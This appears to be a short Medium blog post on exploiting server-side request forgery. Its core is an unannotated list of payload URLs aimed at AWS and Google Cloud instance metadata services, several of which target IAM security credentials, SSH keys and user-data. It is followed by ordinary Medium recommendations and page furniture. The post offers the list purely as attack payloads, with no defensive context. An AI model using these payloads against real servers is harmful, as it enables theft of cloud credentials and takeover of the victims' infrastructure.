Exploiting ssrf vulnerablity part 2

Exploitation

http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://instance-data
http://169.254.169.254
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
payload-credit- cobalt.io
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id

--

--

--

A nerd guy who is in search of seeking knowledge

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Git學習筆記 —Git Flow/GitHub Flow/GitLab Flow

Use Minimally Opinionated Serverless Templates to Accelerate Microservice Deployments

Publishing Tips and Discussing Questions about Inheritance and Polymorphism in Java

Blazing Fast Development

Changing to the pruned Shard 0 Database

Understanding Delegates

From Ruby to Clojure: An Intercom integration story

How can i make an app without coding?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
tox7cv3nom

tox7cv3nom

A nerd guy who is in search of seeking knowledge

More from Medium

TryHackMe: Red Team Recon Walkthrough

HTX Investigators’ Challenge (HTXIC) CTF Write-Up

AppSec Series 0x04: Crowdsourcing Security

HUB Weekly Digest: Log4j Edition🚨